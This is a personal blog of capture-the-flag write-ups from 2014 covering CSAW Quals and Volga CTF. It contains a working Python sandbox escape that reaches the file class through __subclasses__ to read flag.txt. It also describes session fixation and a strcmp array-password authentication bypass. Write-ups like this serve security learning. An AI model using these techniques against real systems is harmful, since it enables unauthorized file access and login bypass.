Monday, 22 September 2014

CSAW CTF 2014 Quals write-up


team r00t, we ended scoring 1250. None of the team members worked for more than half a day, and our team is small, containing 3 members. All lazy people :D

Exploitation - 1: bo



This was a simple problem, or we didn't know how to solve in the way it was meant to be.
As usual as soon as we saw a executable follow the usual procedure -

First, file type

> file bo
bo; ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
Second, look for strings-

> strings bo

When we look at the strings. Oh wait is it the flag. Hell Yeah :D

Welcome to CSAW CTF!

Time to break out IDA Demo and see what's going on inside me.  :]

flag{exploitation_is_easy!}

Exploitation - 2: pybabbies


nc 54.165.210.171 12345

Connect the server with that particular port, We found python console showing up.
Afterwards we opened the source file 

As we played around with the console
- Found its Python 3.x
- It does not show any returned value.
  workaround: Just print the return value.
- Any error the execution will close the connection.

Time to analyse the source code. All the cool module and functions where banned :'(

Checked if there is already a variable with flag or key etc having the flag. And obviously it wasnt that easy. So, maybe there is a file with flag.txt or key.txt where the flag is and we have to open it.

As I have already read few blog posts about escaping Python sandbox, It was easy.

Playing around with tuple. Ended with an interesting part -

>>> print(().__class__.__bases__[0].__subclasses__()[40])

<type 'file'>

Now its obvious try opening flag.txt key.txt etc

>>> print(().__class__.__bases__[0].__subclasses__()[40]("flag.txt"))

<open file 'flag', mode 'r' at 0x.....>

Wow!!! It worked. Now just go ahead and read the file

Welcome to my Python sandbox! Enter commands below!
>>> print(().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read())

flag{definitely_not_intro_python}

>>> exit



Thanks for reading through the write-up. If any thing wrong or can be added to this post. Please put them in the comments :)


Saturday, 19 July 2014

Volga CTF quals 2014

Team r00t managed only 700 points and secured 80th position

This was 1 really son of a difficult CTF

Web100-

If login successful, You will be given a particular phpsession.
Login was easy. you enter random name and it will get registered and access will be given.

Task was Session fixation.

After login in. In source we can see help.php


In link place give your link to the page where the session id is assigned.

and refresh the loged in page.

flag: Easy_task_on_Session_Fixation

Comments are welcomed...
Question solving skill: x7r0n

Web200-

Guess they where using strcmp function to password.
Change password to array elements.


response for the above request [image]

I don't know whether this is how challenge was made to be solved. But this shit worked :D

Comments are welcomed :)